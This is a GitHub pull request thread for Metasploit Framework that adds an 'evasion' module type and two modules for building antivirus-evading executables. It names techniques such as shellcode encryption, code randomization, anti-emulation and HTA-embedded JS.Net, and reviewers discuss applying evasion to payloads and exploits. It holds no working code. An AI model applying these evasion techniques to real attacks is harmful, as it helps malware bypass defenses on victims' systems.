New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add new evasion module type plus a couple of modules #10759

Merged
merged 25 commits into from Oct 7, 2018

Conversation

Projects
None yet
8 participants
@wchen-r7
Contributor

wchen-r7 commented Oct 6, 2018

A little DerbyCon surprise.

This pull request adds a new module type to Framework, called "evasion". The purpose of the evasion module type is to allow developers to build executables specifically to evade antivirus, and hopefully this creates a better pentesting experience for the users.

The PR also comes with two modules that serve as examples. The first one generates an EXE that utilities these techniques: shellcode encryption, code randomization, and a little anti-emulation. For more information about techniques, please check Framework Wiki. The second module uses a JS.Net script that's embedded in a HTA file, which gets compiled and executed on the target machine.

Here's a demonstration:

45052465-7e6ee500-b04c-11e8-90e0-e9c59363bb45

wchen-r7 added some commits Oct 6, 2018

rhost = mod.datastore['RHOST'] || '50.50.50.50'
# A list of preferred payloads in the best-first order
pref = [

This comment has been minimized.

@busterb

busterb Oct 7, 2018

Contributor

It's not clear if we need this for an evasion module, since we're not trying to pair it with an exploit.

@busterb

busterb Oct 7, 2018

Contributor

It's not clear if we need this for an evasion module, since we're not trying to pair it with an exploit.

This comment has been minimized.

@wchen-r7

wchen-r7 Oct 7, 2018

Contributor

Good catch there. Evasion works best with encrypted payloads and I forgot to actually use this method. Should work now. Thanks.

@wchen-r7

wchen-r7 Oct 7, 2018

Contributor

Good catch there. Evasion works best with encrypted payloads and I forgot to actually use this method. Should work now. Thanks.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Oct 7, 2018

Contributor

Nice work @wchen-r7 ! A comment we got while demoing evasion modules was that it would be nice to be able to enable it on regular payloads, like with 'set evasion windows_defender' and it would use the module to modify the payload, similar to an encoder. Not really a blocker here, but something to think about for later.

Contributor

busterb commented Oct 7, 2018

Nice work @wchen-r7 ! A comment we got while demoing evasion modules was that it would be nice to be able to enable it on regular payloads, like with 'set evasion windows_defender' and it would use the module to modify the payload, similar to an encoder. Not really a blocker here, but something to think about for later.

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Oct 7, 2018

Contributor

I thought a/v evasion was one of the big reasons to buy msfpro, Am i confusing something?

Contributor

h00die commented Oct 7, 2018

I thought a/v evasion was one of the big reasons to buy msfpro, Am i confusing something?

@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles Oct 7, 2018

Contributor

@h00die quick, merge it before r7 realizes it's public.

Contributor

bcoles commented Oct 7, 2018

@h00die quick, merge it before r7 realizes it's public.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Oct 7, 2018

Contributor

I thought a/v evasion was one of the big reasons to buy msfpro, Am i confusing something?

We'd like to improve the experience for all Metasploit users, this includes commercial and framework users.

A comment we got while demoing evasion modules was that it would be nice to be able to enable it on regular payloads

That could be on the road map. Thanks for the feedback.

Contributor

wchen-r7 commented Oct 7, 2018

I thought a/v evasion was one of the big reasons to buy msfpro, Am i confusing something?

We'd like to improve the experience for all Metasploit users, this includes commercial and framework users.

A comment we got while demoing evasion modules was that it would be nice to be able to enable it on regular payloads

That could be on the road map. Thanks for the feedback.

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Oct 7, 2018

Contributor

Ninja merge incoming since @bcoles (kind of) approved it!!!

(Kidding, also apologies for the insensitive comment. While meant in jest, it was insensitive especially considering the climate in the states. Sorry to anyone who was offended, it wasn't cool or professional in any way shape or form.)

Contributor

h00die commented Oct 7, 2018

Ninja merge incoming since @bcoles (kind of) approved it!!!

(Kidding, also apologies for the insensitive comment. While meant in jest, it was insensitive especially considering the climate in the states. Sorry to anyone who was offended, it wasn't cool or professional in any way shape or form.)

@0x27

This comment has been minimized.

Show comment
Hide comment
@0x27

0x27 Oct 7, 2018

Suggestion/Query: could this be leveraged by exploit modules that drop an executable file to disc and then execute them? (thinking Command Stager ones) to avoid getting wrecked by AV during exploitation?

0x27 commented Oct 7, 2018

Suggestion/Query: could this be leveraged by exploit modules that drop an executable file to disc and then execute them? (thinking Command Stager ones) to avoid getting wrecked by AV during exploitation?

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Oct 7, 2018

Contributor

I wanted to give this a bit of time for review, but don't worry, it's not going away. Feel free to provide any constructive feedback @h00die, and thanks for the interest.

You can see some more info on this talk at the Metasploit Town Hall 0x4 at Derbycon today: https://youtu.be/4JZlhIj002k?t=1202

Contributor

busterb commented Oct 7, 2018

I wanted to give this a bit of time for review, but don't worry, it's not going away. Feel free to provide any constructive feedback @h00die, and thanks for the interest.

You can see some more info on this talk at the Metasploit Town Hall 0x4 at Derbycon today: https://youtu.be/4JZlhIj002k?t=1202

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Oct 7, 2018

Contributor

Suggestion/Query: could this be leveraged by exploit modules that drop an executable file to disc and then execute them? (thinking Command Stager ones) to avoid getting wrecked by AV during exploitation?

Yes, it could do that, just not now. As a matter of fact, this has been reminded a couple of times so sounds like it's definitely valuable to implement something like that. Thanks for the feedback.

Contributor

wchen-r7 commented Oct 7, 2018

Suggestion/Query: could this be leveraged by exploit modules that drop an executable file to disc and then execute them? (thinking Command Stager ones) to avoid getting wrecked by AV during exploitation?

Yes, it could do that, just not now. As a matter of fact, this has been reminded a couple of times so sounds like it's definitely valuable to implement something like that. Thanks for the feedback.

@Green-m

This comment has been minimized.

Show comment
Hide comment
@Green-m

Green-m Oct 7, 2018

Contributor

I am glad to see this big surprise!
Since there are many antivirus tools, such as AVET, Veil, now we could integrate these into evasion modules, that's very convenient and could keep update for best performance of antivirus.

I love this PR, and I think I could do more contributions for new modules.
Thank you very much @wchen-r7!

Contributor

Green-m commented Oct 7, 2018

I am glad to see this big surprise!
Since there are many antivirus tools, such as AVET, Veil, now we could integrate these into evasion modules, that's very convenient and could keep update for best performance of antivirus.

I love this PR, and I think I could do more contributions for new modules.
Thank you very much @wchen-r7!

@Green-m Green-m added the hotness label Oct 7, 2018

@bcoles

This comment has been minimized.

Show comment
Hide comment
@bcoles

bcoles Oct 7, 2018

Contributor

+1 for implementing evasion as part of msfvenom / metapsloit-payloads so the remainder of the framework benefits.

Contributor

bcoles commented Oct 7, 2018

+1 for implementing evasion as part of msfvenom / metapsloit-payloads so the remainder of the framework benefits.

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Oct 7, 2018

Contributor

I'm going to land this now, so people can start playing with it in master. Thanks for all of the comments!

Thanks @space-r7 and @wchen-r7 !

Contributor

busterb commented Oct 7, 2018

I'm going to land this now, so people can start playing with it in master. Thanks for all of the comments!

Thanks @space-r7 and @wchen-r7 !

@busterb busterb merged commit c6dddaa into rapid7:master Oct 7, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Oct 7, 2018

@busterb

This comment has been minimized.

Show comment
Hide comment
@busterb

busterb Oct 7, 2018

Contributor

Release Notes

This adds a new "evasion" module type to Metasploit Framework, allowing developers to build executables specifically to evade antivirus, and two initial evasion modules using different techniques of evasion. The framework allows users to more easily integrate external tools and write their own evasion modules as well.

Contributor

busterb commented Oct 7, 2018

Release Notes

This adds a new "evasion" module type to Metasploit Framework, allowing developers to build executables specifically to evade antivirus, and two initial evasion modules using different techniques of evasion. The framework allows users to more easily integrate external tools and write their own evasion modules as well.

@ccondon-r7

This comment has been minimized.

Show comment
Hide comment
@ccondon-r7

ccondon-r7 Oct 7, 2018

@h00die - The new module type is the culmination of months of research on evasion techniques and results, and a whole bunch of teams across Rapid7 have been engaged and supportive throughout the process. This isn't a rogue move! As Wei noted, the goal here was to improve evasion for all Metasploit users, including Metasploit Pro customers. The engineering output (i.e., the new module type) looks different in Framework because there was so much emphasis on extensibility. As always, we want the Framework community to be able to build on top of and bring their own perspective to the work the Metasploit engineering team does...which I know you know already, so I'll stop talking and let folks get back to experimenting with the new module type!

ccondon-r7 commented Oct 7, 2018

@h00die - The new module type is the culmination of months of research on evasion techniques and results, and a whole bunch of teams across Rapid7 have been engaged and supportive throughout the process. This isn't a rogue move! As Wei noted, the goal here was to improve evasion for all Metasploit users, including Metasploit Pro customers. The engineering output (i.e., the new module type) looks different in Framework because there was so much emphasis on extensibility. As always, we want the Framework community to be able to build on top of and bring their own perspective to the work the Metasploit engineering team does...which I know you know already, so I'll stop talking and let folks get back to experimenting with the new module type!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment